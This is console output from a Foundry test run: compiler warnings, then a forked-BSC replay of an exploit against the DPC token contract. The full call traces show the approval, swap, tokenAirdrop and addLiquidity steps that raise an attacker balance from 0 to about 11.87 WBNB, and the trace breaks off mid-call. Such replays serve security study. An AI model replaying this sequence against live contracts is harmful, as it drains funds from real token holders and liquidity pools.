Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-09/DPC_exp.sol:28:5:
   |
28 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-09/DPC_exp.sol:29:5:
   |
29 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2022-09/DPC_exp.sol:47:9:
   |
47 |         address(WBNB).call{value: 2 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 903.08ms (3.10ms CPU time)

Ran 1 test for src/test/2022-09/DPC_exp.sol:ContractTest
[PASS] testExploit() (gas: 1250675)
Logs:
  [Start] Attacker WBNB balance before exploit: 0.000000000000000000
  [End] Attacker WBNB balance after exploit: 11.869629497407785960

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 21179209 [2.117e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1364175] ContractTest::testExploit()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker WBNB balance before exploit", val: 0, decimals: 18)
    ├─ [24711] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x002bef3a594ed8de1ee02e2111f5ef42f23e51944ca84d2e6e83bb2c1acb7c7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [24598] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::approve(0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x002bef3a594ed8de1ee02e2111f5ef42f23e51944ca84d2e6e83bb2c1acb7c7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639679 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639679 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeff
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    ├─ [21731] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::fallback{value: 2000000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 2000000000000000000 [2e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2000000000000000000 [2e18]
    ├─ [76674] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(2000000000000000000 [2e18], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662719563 [1.662e9])
    │   ├─ [2893] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::getReserves() [staticcall]
    │   │   └─ ← [Return] 80655051981602918281434479 [8.065e25], 279158001838224320375056 [2.791e23], 1662719563 [1.662e9]
    │   ├─ [8948] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, 2000000000000000000 [2e18])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, value: 2000000000000000000 [2e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeff → 0xffffffffffffffffffffffffffffffffffffffffffffffffe43e9298b137feff
    │   │   │   @ 0x65a91b743eebb93754974b0d76ae6fbcc9c7843adbbd90f71368692e5c22fe4d: 0x000000000000000000000000000000000000000000003b1d2f83ad61e3ba2910 → 0x000000000000000000000000000000000000000000003b1d4b451ac932822910
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [53864] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::swap(576396441201225360309 [5.763e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [29971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 576396441201225360309 [5.763e20])
    │   │   │   ├─ emit Transfer(from: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 576396441201225360309 [5.763e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000001f3f1b8564ae5de3b5
    │   │   │   │   @ 0xba08221f8673e7bcd34c1b8c4689a983ae464d35addf83dda4fe5d5546a79b0d: 0x00000000000000000000000000000000000000000042b75f210767f88af2d56f → 0x00000000000000000000000000000000000000000042b73fe1ebe293dc94f1ba
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   └─ ← [Return] 80654475585161717056074170 [8.065e25]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   └─ ← [Return] 279160001838224320375056 [2.791e23]
    │   │   ├─ emit Sync(reserve0: 80654475585161717056074170 [8.065e25], reserve1: 279160001838224320375056 [2.791e23])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 2000000000000000000 [2e18], amount0Out: 576396441201225360309 [5.763e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x631b164b000000003b1d2f83ad61e3ba291000000042b75f210767f88af2d56f → 0x631b164b000000003b1d4b451ac93282291000000042b73fe1ebe293dc94f1ba
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [2000000000000000000 [2e18], 576396441201225360309 [5.763e20]]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 576396441201225360309 [5.763e20]
    ├─ [162723] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(288198220600612680154 [2.881e20], 0, [0x55d398326f99059fF775485246999027B3197955, 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662719563 [1.662e9])
    │   ├─ [2893] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::getReserves() [staticcall]
    │   │   └─ ← [Return] 107405331616969972002944 [1.074e23], 8250575885330425488143 [8.25e21], 1662719473 [1.662e9]
    │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x79cD24Ed4524373aF6e047556018b1440CF04be3, 288198220600612680154 [2.881e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, value: 288198220600612680154 [2.881e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039169385787312516959781 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffff060723d4da8d10e25
    │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000016be7466cfcc6ec03080 → 0x0000000000000000000000000000000000000000000016ce13f4927ec5ef225a
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000001f3f1b8564ae5de3b5 → 0x00000000000000000000000000000000000000000000000f9f8dc2b2572ef1db
    │   │   └─ ← [Return] true
    │   ├─ [140607] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::swap(0, 22024281847148421630 [2.202e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [104805] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 22024281847148421630 [2.202e19])
    │   │   │   ├─ emit Transfer(from: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 660728455414452648 [6.607e17])
    │   │   │   ├─ [17377] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662748363 [1.662e9]) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000009
    │   │   │   ├─ emit Transfer(from: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, to: 0x000000000000000000000000000000000000dEaD, value: 440485636942968432 [4.404e17])
    │   │   │   ├─ emit Transfer(from: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 20923067754791000548 [2.092e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000049c6acb8b8d4356802b → 0x00000000000000000000000000000000000000000000049c73f6ec94d14f11d3
    │   │   │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x00000000000000000000000000000000000000000000000330da461396783a3b → 0x00000000000000000000000000000000000000000000000336f7316df51df0ab
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000001225dab448fbf59e4
    │   │   │   │   @ 60: 0x000000000000000000000000000000000000000000000008053d894d17d94146 → 0x0000000000000000000000000000000000000000000000080e68ea54a5d1d2ee
    │   │   │   │   @ 59: 0x000000000000000000000000000000000000000000000008053d894d17d94146 → 0x0000000000000000000000000000000000000000000000080e68ea54a5d1d2ee
    │   │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000001bf43bdce489406a30f → 0x0000000000000000000000000000000000000000000001be1217d6a217a90111
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 107693529837570584683098 [1.076e23]
    │   │   ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 8228551603483277066513 [8.228e21]
    │   │   ├─ emit Sync(reserve0: 107693529837570584683098 [1.076e23], reserve1: 8228551603483277066513 [8.228e21])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 288198220600612680154 [2.881e20], amount1In: 0, amount0Out: 0, amount1Out: 22024281847148421630 [2.202e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000000000000493c2d109f7a1dc75b20313bf88bf9c8 → 0x00000000000000000000000000000000494316eeda2e08fbd9a5918bc6cdebf8
    │   │   │   @ 10: 0x000000000000000000000000000000030e4ac465a7d7aaafca3f79bfa9fe27a3 → 0x0000000000000000000000000000000312de614263eabc618b113defeda9d4f9
    │   │   │   @ 8: 0x631b15f10000000001bf43bdce489406a30f0000000016be7466cfcc6ec03080 → 0x631b164b0000000001be1217d6a217a901110000000016ce13f4927ec5ef225a
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [288198220600612680154 [2.881e20], 22024281847148421630 [2.202e19]]
    ├─ [99250] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::tokenAirdrop(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 100)
    │   ├─ [638] 0x55d398326f99059fF775485246999027B3197955::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE) [staticcall]
    │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 100000000000000000000 [1e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 100000000000000000000 [1e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 115792089237316195423570985008687907853269984665640564039357584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000044c31b41c7b48bc000 → 0x00000000000000000000000000000000000000000000004a2ee29ff5179bc000
    │   │   │   @ 0x002bef3a594ed8de1ee02e2111f5ef42f23e51944ca84d2e6e83bb2c1acb7c7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffa9438a1d29cefffff
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000f9f8dc2b2572ef1db → 0x00000000000000000000000000000000000000000000000a33c66484f41ef1db
    │   │   └─ ← [Return] true
    │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x7402B515EfCFFA99035E37c3a60224f6bBF5f1d8, 70000000000000000000 [7e19])
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: 0x7402B515EfCFFA99035E37c3a60224f6bBF5f1d8, value: 70000000000000000000 [7e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x15312214594970a8f023c76c50c6a46b68d655fd2ac0858b55319ab09e80e7ec: 0x0000000000000000000000000000000000000000000000c187b3d55450880000 → 0x0000000000000000000000000000000000000000000000c55325ca7415e00000
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000004a2ee29ff5179bc000 → 0x0000000000000000000000000000000000000000000000466370aad55243c000
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x23019135966ad9f2c91101d60f3678100e06cfe30a275e3d89cd89ea12346c10: 0 → 1
    │   │   @ 0xcdc49e637aab090daaa85eab434d212fa82461b9645970b8cb9110a69106a998: 0 → 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000
    │   │   @ 0x3c3f303012a85fd86f559fc2d8edcdaeca23134600f1d3d56b5813432ad58ecf: 0 → 0x00000000000000000000000000000000000000000000000000000000631b86cb
    │   │   @ 0x15312214594970a8f023c76c50c6a46b68d655fd2ac0858b55319ab09e80e7ec: 0x0000000000000000000000000000000000000000000000c187b3d55450880000 → 0x0000000000000000000000000000000000000000000000c55325ca7415e00000
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 188198220600612680155 [1.881e20]
    ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return] 20923067754791000548 [2.092e19]
    ├─ [176210] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 188198220600612680155 [1.881e20], 20923067754791000548 [2.092e19], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662719563 [1.662e9])
    │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x55d398326f99059fF775485246999027B3197955, 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE) [staticcall]
    │   │   └─ ← [Return] 0x79cD24Ed4524373aF6e047556018b1440CF04be3
    │   ├─ [893] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::getReserves() [staticcall]
    │   │   └─ ← [Return] 107693529837570584683098 [1.076e23], 8228551603483277066513 [8.228e21], 1662719563 [1.662e9]
    │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x79cD24Ed4524373aF6e047556018b1440CF04be3, 188198220600612680155 [1.881e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, value: 188198220600612680155 [1.881e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564038981187566711904279626 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000a33c66484f41ef1db → 0
    │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000016ce13f4927ec5ef225a → 0x0000000000000000000000000000000000000000000016d847baf703ba0e1435
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xfffffffffffffffffffffffffffffffffffffffffffffff060723d4da8d10e25 → 0xffffffffffffffffffffffffffffffffffffffffffffffe62cabd8c8b4b21c4a
    │   │   └─ ← [Return] true
    │   ├─ [77769] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x79cD24Ed4524373aF6e047556018b1440CF04be3, 14379682532753401270 [1.437e19])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 287593650655068025 [2.875e17])
    │   │   ├─ [17377] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662748363 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000009
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 287593650655068025 [2.875e17])
    │   │   ├─ [17377] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662748363 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000009
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2f72fe7CB8784E6b34a62C1E71c9DF4D8451be02, value: 143796825327534012 [1.437e17])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, value: 13660698406115731206 [1.366e19])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039443204325380376238665 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000049c73f6ec94d14f11d3 → 0x00000000000000000000000000000000000000000000049c7bf26662673710c5
    │   │   │   @ 59: 0x0000000000000000000000000000000000000000000000080e68ea54a5d1d2ee → 0x0000000000000000000000000000000000000000000000081266a73b70c5d267
    │   │   │   @ 0xb2cf4bf218ab9fe299fe0ba0f19acacf2db690dfdd02872d6ca2eabde0a0b6ec: 0x000000000000000000000000000000000000000000000001de1ad753b8937cae → 0x000000000000000000000000000000000000000000000001e019b5c71e0d7c6a
    │   │   │   @ 66: 0x000000000000000000000000000000000000000000000003bc35aea77126f9b5 → 0x000000000000000000000000000000000000000000000003c0336b8e3c1af92e
    │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000001be1217d6a217a90111 → 0x0000000000000000000000000000000000000000000001becfac6374bfeee817
    │   │   │   @ 65: 0x000000000000000000000000000000000000000000000003bc35aea77126f9b5 → 0x000000000000000000000000000000000000000000000003c0336b8e3c1af92e
    │   │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffff38711aec5c581a49
